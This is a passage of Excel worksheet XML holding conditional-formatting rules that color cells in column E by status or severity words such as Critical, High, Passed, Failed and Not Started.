    <cfRule type="containsText" dxfId="817" priority="946" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E67)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="816" priority="947" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E67)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E67">
    <cfRule type="containsText" dxfId="815" priority="944" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E67)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="814" priority="945" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E67)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E68">
    <cfRule type="containsText" dxfId="813" priority="926" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E68)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="812" priority="927" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E68)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="811" priority="928" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E68)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="810" priority="929" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E68)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="809" priority="930" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E68)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="808" priority="931" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E68)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="807" priority="932" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E68)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="806" priority="935" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E68)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="805" priority="936" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E68)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E68">
    <cfRule type="containsText" dxfId="804" priority="933" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E68)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="803" priority="934" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E68)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E69">
    <cfRule type="containsText" dxfId="802" priority="915" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E69)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="801" priority="916" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E69)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="800" priority="917" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E69)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="799" priority="918" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E69)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="798" priority="919" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E69)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="797" priority="920" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E69)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="796" priority="921" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E69)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="795" priority="924" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E69)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="794" priority="925" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E69)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E69">
    <cfRule type="containsText" dxfId="793" priority="922" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E69)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="792" priority="923" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E69)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E70">
    <cfRule type="containsText" dxfId="791" priority="904" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E70)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="790" priority="905" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E70)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="789" priority="906" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E70)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="788" priority="907" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E70)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="787" priority="908" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E70)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="786" priority="909" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E70)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="785" priority="910" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E70)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="784" priority="913" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E70)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="783" priority="914" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E70)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E70">
    <cfRule type="containsText" dxfId="782" priority="911" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E70)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="781" priority="912" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E70)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E71">
    <cfRule type="containsText" dxfId="780" priority="893" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E71)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="779" priority="894" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E71)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="778" priority="895" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E71)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="777" priority="896" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E71)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="776" priority="897" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E71)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="775" priority="898" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E71)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="774" priority="899" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E71)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="773" priority="902" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E71)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="772" priority="903" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E71)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E71">
    <cfRule type="containsText" dxfId="771" priority="900" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E71)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="770" priority="901" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E71)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E72:E73">
    <cfRule type="containsText" dxfId="769" priority="882" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E72)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="768" priority="883" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E72)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="767" priority="884" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E72)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="766" priority="885" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E72)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="765" priority="886" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E72)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="764" priority="887" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E72)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="763" priority="888" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E72)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="762" priority="891" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E72)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="761" priority="892" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E72)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E72:E73">
    <cfRule type="containsText" dxfId="760" priority="889" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E72)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="759" priority="890" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E72)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E76">
    <cfRule type="containsText" dxfId="758" priority="871" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="757" priority="872" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="756" priority="873" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="755" priority="874" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="754" priority="875" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="753" priority="876" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="752" priority="877" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="751" priority="880" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="750" priority="881" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E76)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E76">
    <cfRule type="containsText" dxfId="749" priority="878" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E76)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="748" priority="879" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E76)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E77">
    <cfRule type="containsText" dxfId="747" priority="860" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="746" priority="861" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="745" priority="862" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="744" priority="863" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="743" priority="864" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="742" priority="865" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="741" priority="866" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="740" priority="869" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="739" priority="870" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E77)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E77">
    <cfRule type="containsText" dxfId="738" priority="867" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E77)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="737" priority="868" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E77)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E79">
    <cfRule type="containsText" dxfId="736" priority="849" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="735" priority="850" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="734" priority="851" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="733" priority="852" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="732" priority="853" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="731" priority="854" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="730" priority="855" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="729" priority="858" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="728" priority="859" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E79)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E79">
    <cfRule type="containsText" dxfId="727" priority="856" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E79)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="726" priority="857" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E79)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E78">
    <cfRule type="containsText" dxfId="725" priority="838" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="724" priority="839" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="723" priority="840" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="722" priority="841" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="721" priority="842" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="720" priority="843" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="719" priority="844" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="718" priority="847" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="717" priority="848" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E78)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E78">
    <cfRule type="containsText" dxfId="716" priority="845" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E78)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="715" priority="846" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E78)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E80">
    <cfRule type="containsText" dxfId="714" priority="827" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="713" priority="828" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="712" priority="829" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="711" priority="830" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="710" priority="831" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="709" priority="832" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="708" priority="833" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="707" priority="836" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="706" priority="837" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E80)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E80">
    <cfRule type="containsText" dxfId="705" priority="834" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E80)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="704" priority="835" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E80)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E81">
    <cfRule type="containsText" dxfId="703" priority="816" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="702" priority="817" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="701" priority="818" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="700" priority="819" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="699" priority="820" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="698" priority="821" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="697" priority="822" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="696" priority="825" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="695" priority="826" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E81)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E81">
    <cfRule type="containsText" dxfId="694" priority="823" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E81)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="693" priority="824" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E81)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E87">
    <cfRule type="containsText" dxfId="692" priority="805" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="691" priority="806" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="690" priority="807" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="689" priority="808" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="688" priority="809" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="687" priority="810" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="686" priority="811" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="685" priority="814" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="684" priority="815" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E87)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E87">
    <cfRule type="containsText" dxfId="683" priority="812" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E87)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="682" priority="813" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E87)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E90">
    <cfRule type="containsText" dxfId="681" priority="794" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="680" priority="795" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="679" priority="796" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="678" priority="797" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="677" priority="798" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="676" priority="799" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="675" priority="800" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="674" priority="803" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="673" priority="804" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E90)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E90">
    <cfRule type="containsText" dxfId="672" priority="801" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E90)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="671" priority="802" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E90)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E96">
    <cfRule type="containsText" dxfId="670" priority="783" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="669" priority="784" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="668" priority="785" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="667" priority="786" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="666" priority="787" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="665" priority="788" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="664" priority="789" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="663" priority="792" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="662" priority="793" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E96)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E96">
    <cfRule type="containsText" dxfId="661" priority="790" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="660" priority="791" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E96)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E97">
    <cfRule type="containsText" dxfId="659" priority="772" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="658" priority="773" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="657" priority="774" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="656" priority="775" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="655" priority="776" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="654" priority="777" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="653" priority="778" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="652" priority="781" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="651" priority="782" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E97)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E97">
    <cfRule type="containsText" dxfId="650" priority="779" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E97)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="649" priority="780" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E97)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E106">
    <cfRule type="containsText" dxfId="648" priority="761" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E106)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="647" priority="762" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E106)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="646" priority="763" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E106)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="645" priority="764" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E106)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="644" priority="765" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E106)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="643" priority="766" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E106)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="642" priority="767" operator="containsText" text="N/A">
